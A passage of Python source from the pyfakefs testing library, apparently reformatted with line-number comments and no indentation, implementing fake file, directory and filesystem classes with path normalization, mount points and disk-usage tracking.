def SetATime(self, st_atime):
# line: 529
'Set the self.st_atime attribute.\n\n Args:\n st_atime: The desired access time.\n '
# line: 530
self.st_atime = st_atime
# line: 532
def SetMTime(self, st_mtime):
# line: 537
'Set the self.st_mtime attribute.\n\n Args:\n st_mtime: The desired modification time.\n '
# line: 538
self.st_mtime = st_mtime
# line: 540
def SetCTime(self, st_ctime):
# line: 546
'Set the self.st_ctime attribute.\n New in pyfakefs 3.0.\n\n Args:\n st_ctime: The desired creation time.\n '
# line: 547
self.st_ctime = st_ctime
# line: 549
def __getattr__(self, item):
# line: 550
'Forward some properties to stat_result.'
# line: 551
return getattr(self.stat_result, item)
# line: 553
def __setattr__(self, key, value):
# line: 554
'Forward some properties to stat_result.'
# line: 555
if (key in ('st_mode', 'st_ino', 'st_dev', 'st_nlink', 'st_uid', 'st_gid', 'st_size', 'st_atime', 'st_mtime', 'st_ctime', 'st_atime_ns', 'st_mtime_ns', 'st_ctime_ns')):
# line: 558
return setattr(self.stat_result, key, value)
# line: 559
return super(FakeFile, self).__setattr__(key, value)
# line: 561
def __str__(self):
# line: 562
return ('%s(%o)' % (self.name, self.st_mode))
# line: 564
def SetIno(self, st_ino):
# line: 571
'Set the self.st_ino attribute.\n Note that a unique inode is assigned automatically to a new fake file.\n Using this function does not guarantee uniqueness and should used with caution.\n\n Args:\n st_ino: (int) The desired inode.\n '
# line: 572
self.st_ino = st_ino
# line: 575
class FakeFileFromRealFile(FakeFile):
# line: 580
'Represents a fake file copied from the real file system.\n \n The contents of the file are read on demand only.\n New in pyfakefs 3.2.\n '
# line: 582
def __init__(self, file_path, filesystem, read_only=True):
# line: 593
'init.\n\n Args:\n file_path: path to the existing file.\n filesystem: the fake filesystem where the file is created.\n read_only: if set, the file is treated as read-only, e.g. a write access raises an exception;\n otherwise, writing to the file changes the fake file only as usually.\n\n Raises:\n OSError: if the file does not exist in the real file system.\n '
# line: 594
real_stat = os.stat(file_path)
# line: 596
super(FakeFileFromRealFile, self).__init__(name=os.path.basename(file_path), filesystem=filesystem)
# line: 598
self.stat_result.set_from_stat_result(real_stat)
# line: 599
if read_only:
# line: 600
self.st_mode &= 261924
# line: 601
self.file_path = file_path
# line: 602
self.contents_read = False
# line: 604
@property
# line: 604
def byte_contents(self):
# line: 606
if (not self.contents_read):
# line: 607
self.contents_read = True
# line: 608
with io.open(self.file_path, 'rb') as f:
# line: 609
self._byte_contents = f.read()
# line: 611
self.st_atime = os.stat(self.file_path).st_atime
# line: 612
return self._byte_contents
# line: 614
def IsLargeFile(self):
# line: 615
'The contents are never faked.'
# line: 616
return False
# line: 619
class FakeDirectory(FakeFile):
# line: 620
'Provides the appearance of a real directory.'
# line: 622
def __init__(self, name, perm_bits=PERM_DEF, filesystem=None):
# line: 629
'init.\n\n Args:\n name: name of the file/directory, without parent path information\n perm_bits: permission bits. defaults to 0o777.\n filesystem: if set, the fake filesystem where the directory is created\n '
# line: 630
FakeFile.__init__(self, name, (stat.S_IFDIR | perm_bits), {}, filesystem=filesystem)
# line: 632
self.st_nlink += 1
# line: 634
def SetContents(self, contents, encoding=None):
# line: 635
error_class = (OSError if self.filesystem.is_windows_fs else IOError)
# line: 636
raise error_class(errno.EISDIR, 'Trying to write to directory')
# line: 638
@property
# line: 638
def contents(self):
# line: 640
'Return the list of contained directory entries.'
# line: 641
return self.byte_contents
# line: 643
@property
# line: 643
def ordered_dirs(self):
# line: 645
'Return the list of contained directory entry names ordered by creation order.'
# line: 646
return [item[0] for item in sorted(self.byte_contents.items(), key=(lambda entry: entry[1].st_ino))]
# line: 649
def AddEntry(self, path_object):
# line: 658
'Adds a child FakeFile to this directory.\n\n Args:\n path_object: FakeFile instance to add as a child of this directory.\n\n Raises:\n OSError: if the directory has no write permission (Posix only)\n OSError: if the file or directory to be added already exists\n '
# line: 659
if ((not (self.st_mode & PERM_WRITE)) and (not self.filesystem.is_windows_fs)):
# line: 660
raise OSError(errno.EACCES, 'Permission Denied', self.GetPath())
# line: 662
if (path_object.name in self.contents):
# line: 663
raise OSError(errno.EEXIST, 'Object already exists in fake filesystem', self.GetPath())
# line: 667
self.contents[path_object.name] = path_object
# line: 668
path_object.parent_dir = self
# line: 669
self.st_nlink += 1
# line: 670
path_object.st_nlink += 1
# line: 671
path_object.st_dev = self.st_dev
# line: 672
if (path_object.st_nlink == 1):
# line: 673
self.filesystem.ChangeDiskUsage(path_object.GetSize(), path_object.name, self.st_dev)
# line: 675
def GetEntry(self, pathname_name):
# line: 686
'Retrieves the specified child file or directory entry.\n\n Args:\n pathname_name: basename of the child object to retrieve.\n\n Returns:\n fake file or directory object.\n\n Raises:\n KeyError: if no child exists by the specified name.\n '
# line: 687
return self.contents[pathname_name]
# line: 689
def RemoveEntry(self, pathname_name, recursive=True):
# line: 701
'Removes the specified child file or directory.\n\n Args:\n pathname_name: basename of the child object to remove.\n recursive: if True (default), the entries in contained directories are deleted first.\n Needed to propagate removal errors (e.g. permission problems) from contained entries.\n New in pyfakefs 2.9.\n\n Raises:\n KeyError: if no child exists by the specified name.\n OSError: if user lacks permission to delete the file, or (Windows only) the file is open.\n '
# line: 702
entry = self.contents[pathname_name]
# line: 703
if ((entry.st_mode & PERM_WRITE) == 0):
# line: 704
raise OSError(errno.EACCES, 'Trying to remove object without write permission', pathname_name)
# line: 706
if (self.filesystem.is_windows_fs and self.filesystem.HasOpenFile(entry)):
# line: 707
raise OSError(errno.EACCES, 'Trying to remove an open file', pathname_name)
# line: 708
if (recursive and isinstance(entry, FakeDirectory)):
# line: 709
while entry.contents:
# line: 710
entry.RemoveEntry(list(entry.contents)[0])
elif (entry.st_nlink == 1):
# line: 712
self.filesystem.ChangeDiskUsage((- entry.GetSize()), pathname_name, entry.st_dev)
# line: 714
self.st_nlink -= 1
# line: 715
entry.st_nlink -= 1
# line: 716
assert (entry.st_nlink >= 0)
# line: 718
del self.contents[pathname_name]
# line: 720
def GetSize(self):
# line: 723
'Return the total size of all files contained in this directory tree.\n New in pyfakefs 2.9.\n '
# line: 724
return sum([item[1].GetSize() for item in self.contents.items()])
# line: 726
def HasParentObject(self, dir_object):
# line: 728
'Return `True` if dir_object is a direct or indirect parent directory,\n or if both are the same object.'
# line: 729
obj = self
# line: 730
while obj:
# line: 731
if (obj == dir_object):
# line: 732
return True
# line: 733
obj = obj.parent_dir
# line: 734
return False
# line: 736
def __str__(self):
# line: 737
description = (super(FakeDirectory, self).__str__() + ':\n')
# line: 738
for item in self.contents:
# line: 739
item_desc = self.contents[item].__str__()
# line: 740
for line in item_desc.split('\n'):
# line: 741
if line:
# line: 742
description = (((description + ' ') + line) + '\n')
# line: 743
return description
# line: 746
class FakeDirectoryFromRealDirectory(FakeDirectory):
# line: 751
'Represents a fake directory copied from the real file system.\n \n The contents of the directory are read on demand only.\n New in pyfakefs 3.2.\n '
# line: 753
def __init__(self, dir_path, filesystem, read_only):
# line: 765
'init.\n\n Args:\n dir_path: full directory path\n filesystem: the fake filesystem where the directory is created\n read_only: if set, all files under the directory are treated as read-only,\n e.g. a write access raises an exception;\n otherwise, writing to the files changes the fake files only as usually.\n \n Raises:\n OSError if the directory does not exist in the real file system\n '
# line: 766
real_stat = os.stat(dir_path)
# line: 767
super(FakeDirectoryFromRealDirectory, self).__init__(name=os.path.split(dir_path)[1], perm_bits=real_stat.st_mode, filesystem=filesystem)
# line: 772
self.st_ctime = real_stat.st_ctime
# line: 773
self.st_atime = real_stat.st_atime
# line: 774
self.st_mtime = real_stat.st_mtime
# line: 775
self.st_gid = real_stat.st_gid
# line: 776
self.st_uid = real_stat.st_uid
# line: 777
self.dir_path = dir_path
# line: 778
self.read_only = read_only
# line: 779
self.contents_read = False
# line: 781
@property
# line: 781
def contents(self):
# line: 783
'Return the list of contained directory entries, loading them if not already loaded.'
# line: 784
if (not self.contents_read):
# line: 785
self.contents_read = True
# line: 786
self.filesystem.add_real_paths([os.path.join(self.dir_path, entry) for entry in os.listdir(self.dir_path)], read_only=self.read_only)
# line: 789
return self.byte_contents
# line: 791
def GetSize(self):
# line: 793
if (not self.contents_read):
# line: 794
return 0
# line: 795
return super(FakeDirectoryFromRealDirectory, self).GetSize()
# line: 798
class FakeFilesystem(object):
# line: 809
'Provides the appearance of a real directory tree for unit testing.\n\n Attributes:\n path_separator: The path separator, corresponds to `os.path.sep`.\n alternative_path_separator: Corresponds to `os.path.altsep`.\n is_windows_fs: `True` in a Windows file system, `False` otherwise.\n is_case_sensitive: `True` if a case-sensitive file system is assumed.\n root: The root `FakeDirectory` entry of the file system.\n cwd: The current working directory path.\n umask: The umask used for newly created files, see `os.umask`.\n '
# line: 811
def __init__(self, path_separator=os.path.sep, total_size=None):
# line: 823
"init.\n\n Args:\n path_separator: optional substitute for os.path.sep\n total_size: if not None, the total size in bytes of the root filesystem.\n New in pyfakefs 2.9.\n\n Example usage to emulate real file systems:\n filesystem = FakeFilesystem(\n alt_path_separator='/' if _is_windows else None)\n\n "
# line: 824
self.path_separator = path_separator
# line: 825
self.alternative_path_separator = os.path.altsep
# line: 826
if (path_separator != os.sep):
# line: 827
self.alternative_path_separator = None
# line: 832
self.is_windows_fs = (sys.platform == 'win32')
# line: 836
self.is_case_sensitive = (sys.platform not in ['win32', 'cygwin', 'darwin'])
# line: 838
self.root = FakeDirectory(self.path_separator, filesystem=self)
# line: 839
self.cwd = self.root.name
# line: 841
self.umask = os.umask(18)
# line: 842
os.umask(self.umask)
# line: 845
self.open_files = []
# line: 847
self._free_fd_heap = []
# line: 849
self._last_ino = 0
# line: 850
self._last_dev = 0
# line: 851
self.mount_points = {}
# line: 852
self.AddMountPoint(self.root.name, total_size)
# line: 854
@staticmethod
# line: 854
def _matching_string(matched, string):
# line: 858
'Return the string as byte or unicode depending \n on the type of matched, assuming string is an ASCII string.\n '
# line: 859
if (string is None):
# line: 860
return string
# line: 861
if (sys.version_info < (3,)):
# line: 862
if isinstance(matched, unicode):
# line: 863
return unicode(string)
else:
# line: 865
return string
elif isinstance(matched, bytes):
# line: 868
return bytes(string, 'ascii')
else:
# line: 870
return string
# line: 872
def _path_separator(self, path):
# line: 873
'Return the path separator as the same type as path'
# line: 874
return self._matching_string(path, self.path_separator)
# line: 876
def _alternative_path_separator(self, path):
# line: 877
'Return the alternative path separator as the same type as path'
# line: 878
return self._matching_string(path, self.alternative_path_separator)
# line: 880
def _IsLinkSupported(self):
# line: 882
return ((not self.is_windows_fs) or (sys.version_info >= (3, 2)))
# line: 884
def AddMountPoint(self, path, total_size=None):
# line: 900
'Add a new mount point for a filesystem device.\n The mount point gets a new unique device number.\n New in pyfakefs 2.9.\n\n Args:\n path: The root path for the new mount path.\n\n total_size: The new total size of the added filesystem device\n in bytes. Defaults to infinite size.\n\n Returns:\n The newly created mount point dict.\n\n Raises:\n OSError: if trying to mount an existing mount point again.\n '
# line: 901
path = self.NormalizePath(path)
# line: 902
if (path in self.mount_points):
# line: 903
raise OSError(errno.EEXIST, 'Mount point cannot be added twice', path)
# line: 904
self._last_dev += 1
# line: 905
self.mount_points[path] = {'idev': self._last_dev, 'total_size': total_size, 'used_size': 0, }
# line: 909
root_dir = (self.root if (path == self.root.name) else self.CreateDirectory(path))
# line: 910
root_dir.st_dev = self._last_dev
# line: 911
return self.mount_points[path]
# line: 913
def _AutoMountDriveIfNeeded(self, path, force=False):
# line: 914
if (self.is_windows_fs and (force or (not self._MountPointForPath(path)))):
# line: 915
drive = self.SplitDrive(path)[0]
# line: 916
if drive:
# line: 917
return self.AddMountPoint(path=drive)
# line: 919
def _MountPointForPath(self, path):
# line: 920
def to_str(string):
# line: 921
'Convert the str, unicode or byte object to a str using the default encoding.'
# line: 922
if ((string is None) or isinstance(string, str)):
# line: 923
return string
# line: 924
if (sys.version_info < (3, 0)):
# line: 925
return string.encode(locale.getpreferredencoding(False))
else:
# line: 927
return string.decode(locale.getpreferredencoding(False))
# line: 929
path = self.NormalizePath(self.NormalizeCase(path))
# line: 930
if (path in self.mount_points):
# line: 931
return self.mount_points[path]
# line: 932
mount_path = self._matching_string(path, '')
# line: 933
drive = self.SplitDrive(path)[:1]
# line: 934
for root_path in self.mount_points:
# line: 935
root_path = self._matching_string(path, root_path)
# line: 936
if (drive and (not root_path.startswith(drive))):
# line: 937
continue
# line: 938
if (path.startswith(root_path) and (len(root_path) > len(mount_path))):
# line: 939
mount_path = root_path
# line: 940
if mount_path:
# line: 941
return self.mount_points[to_str(mount_path)]
# line: 942
mount_point = self._AutoMountDriveIfNeeded(path, force=True)
# line: 943
assert mount_point
# line: 944
return mount_point
# line: 946
def _MountPointForDevice(self, idev):
# line: 947
for mount_point in self.mount_points.values():
# line: 948
if (mount_point['idev'] == idev):
# line: 949
return mount_point
# line: 951
def GetDiskUsage(self, path=None):
# line: 961
"Return the total, used and free disk space in bytes as named tuple,\n or placeholder values simulating unlimited space if not set.\n Note: This matches the return value of shutil.disk_usage().\n New in pyfakefs 2.9.\n\n Args:\n path: The disk space is returned for the file system device where\n path resides.\n Defaults to the root path (e.g. '/' on Unix systems).\n "
# line: 962
DiskUsage = namedtuple('usage', 'total, used, free')
# line: 963
if (path is None):
# line: 964
mount_point = self.mount_points[self.root.name]
else:
# line: 966
mount_point = self._MountPointForPath(path)
# line: 967
if (mount_point and (mount_point['total_size'] is not None)):
# line: 968
return DiskUsage(mount_point['total_size'], mount_point['used_size'], (mount_point['total_size'] - mount_point['used_size']))
# line: 970
return DiskUsage((((1024 * 1024) * 1024) * 1024), 0, (((1024 * 1024) * 1024) * 1024))
# line: 972
def SetDiskUsage(self, total_size, path=None):
# line: 986
"Changes the total size of the file system, preserving the used space.\n Example usage: set the size of an auto-mounted Windows drive.\n New in pyfakefs 2.9.\n\n Args:\n total_size: The new total size of the filesystem in bytes.\n\n path: The disk space is changed for the file system device where\n path resides.\n Defaults to the root path (e.g. '/' on Unix systems).\n\n Raises:\n IOError: if the new space is smaller than the used size.\n "
# line: 987
if (path is None):
# line: 988
path = self.root.name
# line: 989
mount_point = self._MountPointForPath(path)
# line: 990
if ((mount_point['total_size'] is not None) and (mount_point['used_size'] > total_size)):
# line: 991
raise IOError(errno.ENOSPC, ('Fake file system: cannot change size to %r bytes - used space is larger' % total_size), path)
# line: 994
mount_point['total_size'] = total_size
# line: 996
def ChangeDiskUsage(self, usage_change, file_path, st_dev):
# line: 1010
'Change the used disk space by the given amount.\n New in pyfakefs 2.9.\n\n Args:\n usage_change: Number of bytes added to the used space.\n If negative, the used space will be decreased.\n\n file_path: The path of the object needing the disk space.\n\n st_dev: The device ID for the respective file system.\n\n Raises:\n IOError: if usage_change exceeds the free file system space\n '
# line: 1011
mount_point = self._MountPointForDevice(st_dev)
# line: 1012
if mount_point:
# line: 1013
if (mount_point['total_size'] is not None):
# line: 1014
if ((mount_point['total_size'] - mount_point['used_size']) < usage_change):
# line: 1015
raise IOError(errno.ENOSPC, ('Fake file system: disk is full, failed to add %r bytes' % usage_change), file_path)
# line: 1018
mount_point['used_size'] += usage_change
# line: 1020
def GetStat(self, entry_path, follow_symlinks=True):
# line: 1034
"Return the os.stat-like tuple for the FakeFile object of entry_path.\n New in pyfakefs 3.0.\n\n Args:\n entry_path: path to filesystem object to retrieve.\n follow_symlinks: if False and entry_path points to a symlink, the link itself is inspected\n instead of the linked object.\n\n Returns:\n the FakeStatResult object corresponding to entry_path.\n\n Raises:\n OSError: if the filesystem object doesn't exist.\n "
# line: 1036
try:
# line: 1037
file_object = self.ResolveObject(entry_path, follow_symlinks, allow_fd=True)
# line: 1038
return file_object.stat_result.copy()
# line: 1039
except IOError as io_error:
# line: 1040
raise OSError(io_error.errno, io_error.strerror, entry_path)
# line: 1042
def ChangeMode(self, path, mode, follow_symlinks=True):
# line: 1051
'Change the permissions of a file as encoded in integer mode.\n New in pyfakefs 3.0.\n\n Args:\n path: (str) Path to the file.\n mode: (int) Permissions.\n follow_symlinks: if False and entry_path points to a symlink, the link itself is affected\n instead of the linked object.\n '
# line: 1052
try:
# line: 1053
file_object = self.ResolveObject(path, follow_symlinks, allow_fd=True)
# line: 1054
except IOError as io_error:
# line: 1055
if (io_error.errno == errno.ENOENT):
# line: 1056
raise OSError(errno.ENOENT, 'No such file or directory in fake filesystem', path)
# line: 1059
raise
# line: 1060
file_object.st_mode = ((file_object.st_mode & (~ PERM_ALL)) | (mode & PERM_ALL))
# line: 1062
file_object.st_ctime = time.time()
# line: 1064
def UpdateTime(self, path, times=None, ns=None, follow_symlinks=True):
# line: 1086
'Change the access and modified times of a file.\n New in pyfakefs 3.0.\n\n Args:\n path: (str) Path to the file.\n times: 2-tuple of int or float numbers, of the form (atime, mtime) \n which is used to set the access and modified times in seconds. \n If None, both times are set to the current time.\n ns: 2-tuple of int numbers, of the form (atime, mtime) which is \n used to set the access and modified times in nanoseconds. \n If None, both times are set to the current time.\n New in Python 3.3. New in pyfakefs 3.3.\n follow_symlinks: If `False` and entry_path points to a symlink, \n the link itself is queried instead of the linked object. \n New in Python 3.3. New in pyfakefs 3.0.\n \n Raises:\n TypeError: If anything other than the expected types is \n specified in the passed `times` or `ns` tuple, \n or if the tuple length is not equal to 2.\n ValueError: If both times and ns are specified.\n '
# line: 1087
if ((times is not None) and (ns is not None)):
# line: 1088
raise ValueError("utime: you may specify either 'times' or 'ns' but not both")
# line: 1089
if ((times is not None) and (len(times) != 2)):
# line: 1090
raise TypeError("utime: 'times' must be either a tuple of two ints or None")
# line: 1091
if ((ns is not None) and (len(ns) != 2)):
# line: 1092
raise TypeError("utime: 'ns' must be a tuple of two ints")
# line: 1094
try:
# line: 1095
file_object = self.ResolveObject(path, follow_symlinks, allow_fd=True)
# line: 1096
except IOError as io_error:
# line: 1097
if (io_error.errno == errno.ENOENT):
# line: 1098
raise OSError(errno.ENOENT, 'No such file or directory in fake filesystem', path)
# line: 1101
raise
# line: 1102
if (times is not None):
# line: 1103
for file_time in times:
# line: 1104
if (not isinstance(file_time, (int, float))):
# line: 1105
raise TypeError('atime and mtime must be numbers')
# line: 1107
file_object.st_atime = times[0]
# line: 1108
file_object.st_mtime = times[1]
elif (ns is not None):
# line: 1110
for file_time in ns:
# line: 1111
if (not isinstance(file_time, int)):
# line: 1112
raise TypeError('atime and mtime must be ints')
# line: 1114
file_object.st_atime_ns = ns[0]
# line: 1115
file_object.st_mtime_ns = ns[1]
else:
# line: 1117
current_time = time.time()
# line: 1118
file_object.st_atime = current_time
# line: 1119
file_object.st_mtime = current_time
# line: 1121
def SetIno(self, path, st_ino):
# line: 1129
"Set the self.st_ino attribute of file at 'path'.\n Note that a unique inode is assigned automatically to a new fake file.\n Using this function does not guarantee uniqueness and should used with caution.\n\n Args:\n path: Path to file.\n st_ino: The desired inode.\n "
# line: 1130
self.GetObject(path).SetIno(st_ino)
# line: 1132
def AddOpenFile(self, file_obj):
# line: 1142
'Add file_obj to the list of open files on the filesystem.\n\n The position in the self.open_files array is the file descriptor number.\n\n Args:\n file_obj: file object to be added to open files list.\n\n Returns:\n File descriptor number for the file object.\n '
# line: 1143
if self._free_fd_heap:
# line: 1144
open_fd = heapq.heappop(self._free_fd_heap)
# line: 1145
self.open_files[open_fd] = file_obj
# line: 1146
return open_fd
# line: 1148
self.open_files.append(file_obj)
# line: 1149
return (len(self.open_files) - 1)
# line: 1151
def CloseOpenFile(self, file_des):
# line: 1158
'Remove file object with given descriptor from the list of open files.\n\n Sets the entry in open_files to None.\n\n Args:\n file_des: descriptor of file object to be removed from open files list.\n '
# line: 1159
self.open_files[file_des] = None
# line: 1160
heapq.heappush(self._free_fd_heap, file_des)
# line: 1162
def GetOpenFile(self, file_des):
# line: 1174
'Return an open file.\n\n Args:\n file_des: file descriptor of the open file.\n\n Raises:\n OSError: an invalid file descriptor.\n TypeError: filedes is not an integer.\n\n Returns:\n Open file object.\n '
# line: 1175
if (not isinstance(file_des, int)):
# line: 1176
raise TypeError('an integer is required')
# line: 1177
if ((file_des >= len(self.open_files)) or (self.open_files[file_des] is None)):
# line: 1179
raise OSError(errno.EBADF, 'Bad file descriptor', file_des)
# line: 1180
return self.open_files[file_des]
# line: 1182
def HasOpenFile(self, file_object):
# line: 1191
'Return True if the given file object is in the list of open files.\n New in pyfakefs 2.9.\n\n Args:\n file_object: The FakeFile object to be checked.\n\n Returns:\n True if the file is open.\n '
# line: 1192
return (file_object in [wrapper.GetObject() for wrapper in self.open_files if wrapper])
# line: 1194
def NormalizePathSeparator(self, path):
# line: 1204
'Replace all appearances of alternative path separator with path separator.\n Do nothing if no alternative separator is set.\n New in pyfakefs 2.9.\n\n Args:\n path: the path to be normalized.\n\n Returns:\n The normalized path that will be used internally.\n '
# line: 1205
if (sys.version_info >= (3, 6)):
# line: 1206
path = os.fspath(path)
# line: 1207
if ((self.alternative_path_separator is None) or (not path)):
# line: 1208
return path
# line: 1209
return path.replace(self._alternative_path_separator(path), self._path_separator(path))
# line: 1211
def CollapsePath(self, path):
# line: 1230
"Mimic os.path.normpath using the specified path_separator.\n\n Mimics os.path.normpath using the path_separator that was specified\n for this FakeFilesystem. Normalizes the path, but unlike the method\n NormalizePath, does not make it absolute. Eliminates dot components\n (. and ..) and combines repeated path separators (//). Initial ..\n components are left in place for relative paths. If the result is an empty\n path, '.' is returned instead.\n\n This also replaces alternative path separator with path separator. That is,\n it behaves like the real os.path.normpath on Windows if initialized with\n '\\' as path separator and '/' as alternative separator.\n\n Args:\n path: (str) The path to normalize.\n\n Returns:\n (str) A copy of path with empty components and dot components removed.\n "
# line: 1231
path = self.NormalizePathSeparator(path)
# line: 1232
(drive, path) = self.SplitDrive(path)
# line: 1233
sep = self._path_separator(path)
# line: 1234
is_absolute_path = path.startswith(sep)
# line: 1235
path_components = path.split(sep)
# line: 1236
collapsed_path_components = []
# line: 1237
dot = self._matching_string(path, '.')
# line: 1238
dotdot = self._matching_string(path, '..')
# line: 1239
for component in path_components:
# line: 1240
if ((not component) or (component == dot)):
# line: 1241
continue
# line: 1242
if (component == dotdot):
# line: 1243
if (collapsed_path_components and (collapsed_path_components[(-1)] != dotdot)):
# line: 1246
collapsed_path_components.pop()
# line: 1247
continue
elif is_absolute_path:
# line: 1250
continue
# line: 1251
collapsed_path_components.append(component)
# line: 1252
collapsed_path = sep.join(collapsed_path_components)
# line: 1253
if is_absolute_path:
# line: 1254
collapsed_path = (sep + collapsed_path)
# line: 1255
return ((drive + collapsed_path) or dot)
# line: 1257
def NormalizeCase(self, path):
# line: 1267
'Return a normalized case version of the given path for case-insensitive\n file systems. For case-sensitive file systems, return path unchanged.\n New in pyfakefs 2.9.\n\n Args:\n path: the file path to be transformed\n\n Returns:\n A version of path matching the case of existing path elements.\n '
# line: 1268
def components_to_path():
# line: 1269
if (len(path_components) > len(normalized_components)):
# line: 1270
normalized_components.extend(path_components[len(normalized_components):])
# line: 1271
sep = self._path_separator(path)
# line: 1272
normalized_path = sep.join(normalized_components)
# line: 1273
if (path.startswith(sep) and (not normalized_path.startswith(sep))):
# line: 1274
normalized_path = (sep + normalized_path)
# line: 1275
return normalized_path
# line: 1277
if (self.is_case_sensitive or (not path)):
# line: 1278
return path
# line: 1279
path_components = self.GetPathComponents(path)
# line: 1280
normalized_components = []
# line: 1281
current_dir = self.root
# line: 1282
for component in path_components:
# line: 1283
if (not isinstance(current_dir, FakeDirectory)):
# line: 1284
return components_to_path()
# line: 1285
(dir_name, current_dir) = self._DirectoryContent(current_dir, component)
# line: 1286
if ((current_dir is None) or (isinstance(current_dir, FakeDirectory) and (current_dir._byte_contents is None) and (current_dir.st_size == 0))):
# line: 1290
return components_to_path()
# line: 1291
normalized_components.append(dir_name)
# line: 1292
return components_to_path()
# line: 1294
def NormalizePath(self, path):
# line: 1306
'Absolutize and minimalize the given path.\n\n Forces all relative paths to be absolute, and normalizes the path to\n eliminate dot and empty components.\n\n Args:\n path: path to normalize\n\n Returns:\n The normalized path relative to the current working directory, or the root\n directory if path is empty.\n '
# line: 1307
path = self.NormalizePathSeparator(path)
# line: 1308
if (not path):
# line: 1309
path = self.path_separator
elif (not self._StartsWithRootPath(path)):
# line: 1312
root_name = self._matching_string(path, self.root.name)
# line: 1313
empty = self._matching_string(path, '')
# line: 1314
path = self._path_separator(path).join(((((self.cwd != root_name) and self.cwd) or empty), path))
# line: 1316
if (path == self._matching_string(path, '.')):
# line: 1317
path = self.cwd
# line: 1318
return self.CollapsePath(path)
# line: 1320
def SplitPath(self, path):
# line: 1332
'Mimic os.path.split using the specified path_separator.\n\n Mimics os.path.split using the path_separator that was specified\n for this FakeFilesystem.\n\n Args:\n path: (str) The path to split.\n\n Returns:\n (str) A duple (pathname, basename) for which pathname does not\n end with a slash, and basename does not contain a slash.\n '
# line: 1333
(drive, path) = self.SplitDrive(path)
# line: 1334
path = self.NormalizePathSeparator(path)
# line: 1335
sep = self._path_separator(path)
# line: 1336
path_components = path.split(sep)
# line: 1337
if (not path_components):
# line: 1338
return ('', '')
# line: 1339
basename = path_components.pop()
# line: 1340
if (not path_components):
# line: 1341
return ('', basename)
# line: 1342
for component in path_components:
# line: 1343
if component:
# line: 1346
while (not path_components[(-1)]):
# line: 1347
path_components.pop()
# line: 1348
return ((drive + sep.join(path_components)), basename)
# line: 1350
return ((drive or sep), basename)
# line: 1352
def SplitDrive(self, path):
# line: 1363
'Splits the path into the drive part and the rest of the path.\n New in pyfakefs 2.9.\n\n Taken from Windows specific implementation in Python 3.5 and slightly adapted.\n\n Args:\n path: the full path to be split.\n\n Returns: a tuple of the drive part and the rest of the path, or of an empty string\n and the full path if drive letters are not supported or no drive is present.\n '
# line: 1364
if (sys.version_info >= (3, 6)):
# line: 1365
path = os.fspath(path)
# line: 1366
if self.is_windows_fs:
# line: 1367
if (len(path) >= 2):
# line: 1368
path = self.NormalizePathSeparator(path)
# line: 1369
sep = self._path_separator(path)
# line: 1371
if (sys.version_info >= (2, 7, 8)):
# line: 1372
if ((path[0:2] == (sep * 2)) and (path[2:3] != sep)):
# line: 1375
sep_index = path.find(sep, 2)
# line: 1376
if (sep_index == (-1)):
# line: 1377
return (path[:0], path)
# line: 1378
sep_index2 = path.find(sep, (sep_index + 1))
# line: 1379
if (sep_index2 == (sep_index + 1)):
# line: 1380
return (path[:0], path)
# line: 1381
if (sep_index2 == (-1)):
# line: 1382
sep_index2 = len(path)
# line: 1383
return (path[:sep_index2], path[sep_index2:])
# line: 1384
if (path[1:2] == self._matching_string(path, ':')):
# line: 1385
return (path[:2], path[2:])
# line: 1386
return (path[:0], path)
# line: 1388
def _JoinPathsWithDriveSupport(self, *all_paths):
# line: 1389
'Taken from Python 3.5 os.path.join() code in ntpath.py and slightly adapted'
# line: 1390
base_path = all_paths[0]
# line: 1391
paths_to_add = all_paths[1:]
# line: 1392
sep = self._path_separator(base_path)
# line: 1393
seps = [sep, self._alternative_path_separator(base_path)]
# line: 1394
(result_drive, result_path) = self.SplitDrive(base_path)
# line: 1395
for path in paths_to_add:
# line: 1396
(drive_part, path_part) = self.SplitDrive(path)
# line: 1397
if (path_part and (path_part[:1] in seps)):
# line: 1399
if (drive_part or (not result_drive)):
# line: 1400
result_drive = drive_part
# line: 1401
result_path = path_part
# line: 1402
continue
elif (drive_part and (drive_part != result_drive)):
# line: 1404
if (self.is_case_sensitive or (drive_part.lower() != result_drive.lower())):
# line: 1406
result_drive = drive_part
# line: 1407
result_path = path_part
# line: 1408
continue
# line: 1410
result_drive = drive_part
# line: 1412
if (result_path and (result_path[(-1):] not in seps)):
# line: 1413
result_path = (result_path + sep)
# line: 1414
result_path = (result_path + path_part)
# line: 1416
colon = self._matching_string(base_path, ':')
# line: 1417
if (result_path and (result_path[:1] not in seps) and result_drive and (result_drive[(-1):] != colon)):
# line: 1419
return ((result_drive + sep) + result_path)
# line: 1420
return (result_drive + result_path)
# line: 1422
def JoinPaths(self, *paths):
# line: 1431
'Mimic os.path.join using the specified path_separator.\n\n Args:\n *paths: (str) Zero or more paths to join.\n\n Returns:\n (str) The paths joined by the path separator, starting with the last\n absolute path in paths.\n '
# line: 1432
if (sys.version_info >= (3, 6)):
# line: 1433
paths = [os.fspath(path) for path in paths]
# line: 1434
if (len(paths) == 1):
# line: 1435
return paths[0]
# line: 1436
if self.is_windows_fs:
# line: 1437
return self._JoinPathsWithDriveSupport(*paths)
# line: 1438
joined_path_segments = []
# line: 1439
sep = self._path_separator(paths[0])
# line: 1440
for path_segment in paths:
# line: 1441
if self._StartsWithRootPath(path_segment):
# line: 1443
joined_path_segments = [path_segment]
else:
# line: 1445
if (joined_path_segments and (not joined_path_segments[(-1)].endswith(sep))):
# line: 1447
joined_path_segments.append(sep)
# line: 1448
if path_segment:
# line: 1449
joined_path_segments.append(path_segment)
# line: 1450
return self._matching_string(paths[0], '').join(joined_path_segments)
# line: 1452
def GetPathComponents(self, path):
# line: 1473
'Breaks the path into a list of component names.\n\n Does not include the root directory as a component, as all paths\n are considered relative to the root directory for the FakeFilesystem.\n Callers should basically follow this pattern:\n\n >>> file_path = self.NormalizePath(file_path)\n >>> path_components = self.GetPathComponents(file_path)\n >>> current_dir = self.root\n >>> for component in path_components:\n >>> if component not in current_dir.contents:\n >>> raise IOError\n >>> DoStuffWithComponent(current_dir, component)\n >>> current_dir = current_dir.GetEntry(component)\n\n Args:\n path: path to tokenize\n\n Returns:\n The list of names split from path\n '
# line: 1474
if ((not path) or (path == self._path_separator(path))):
# line: 1475
return []
# line: 1476
(drive, path) = self.SplitDrive(path)
# line: 1477
path_components = path.split(self._path_separator(path))
# line: 1478
assert (drive or path_components)
# line: 1479
if (not path_components[0]):
# line: 1481
path_components = path_components[1:]
# line: 1482
if drive:
# line: 1483
path_components.insert(0, drive)
# line: 1484
return path_components
# line: 1486
def StartsWithDriveLetter(self, file_path):
# line: 1496
